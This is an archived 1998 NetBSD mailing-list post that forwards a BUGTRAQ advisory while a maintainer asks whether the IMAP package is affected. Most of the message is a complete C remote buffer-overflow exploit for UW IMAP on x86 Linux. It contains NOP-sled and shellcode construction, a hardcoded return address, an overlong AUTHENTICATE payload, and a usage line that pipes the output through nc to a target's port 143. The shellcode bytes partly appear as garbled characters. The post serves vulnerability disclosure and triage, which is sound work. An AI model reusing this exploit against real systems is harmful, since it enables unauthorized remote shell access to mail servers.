Subject: new exploit for linux imap (fwd)
To: None <tech-pkg@NetBSD.ORG>
From: Markus Illenseer <markus@core.de>
List: tech-pkg
Date: 07/23/1998 18:19:20
Does this affect our IMAP-package? Does it affect NetBSD at all?
---------- Forwarded message ----------
Date: Thu, 23 Jul 1998 02:29:05 +0200
From: "carlosfdez@redestb.es" <joanra@JET.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: new exploit for linux imap
/*
UW Imap remote exploit for x86Linux by Juan A. Fernández Jiménez
(carlosfdez@redestb.es)
Systems affect: Ummm...I only tested it in IMAP4rev1v10.203
Greetz to: Koji, Sud, Darkmoon, Marneus, NBH Group ...
How to use: # (./imaplinux;cat) | nc target_host 143
Note:
This exploit is based in the remote exploit created by Cheez Whiz.
You feel free to change the nops,offsets and esp...the shellcode is
all original from me... :P ...no problems with toupper()
ESP=0xBFFFF04C for v10.203
22/07/98 23:26
*/
#define BUF 2048
#define NOP 0x90
char shellcode[]=
"\xeb\x33\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x80\x46"
"\x01\x80\x80\x46\x02\x80\x80\x46\x03\x80\x80\x46\x05\x80\x80\x46"
"\x06\x80\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xc8\xff\xff\xff/âéî/óč.........";
char buffer[BUF];
long int nop=422,esp=0xBFFFF04C,offset=100;
void main() {
int cont;
memset(buffer,NOP,sizeof(buffer));
memcpy(buffer+nop,shellcode,strlen(shellcode));
for(cont=nop+strlen(shellcode);cont < BUF-4;cont+=4) *((int *)
&buffer[cont])=esp+offset;
printf("* AUTHENTICATE {%d}\r\n",BUF);
for(cont=0;cont<sizeof(buffer);cont++) putchar(buffer[cont]);
printf("\r\n");
}
---> DPN-Mailingliste: tech-l@dpn.de <---
----- End of forwarded message from Harald Wieland -----
--
Markus Illenseer
NetBSD 1.3.2 CD-ROM "Gateway! Vol. 3" now shipping! See: http://core.de/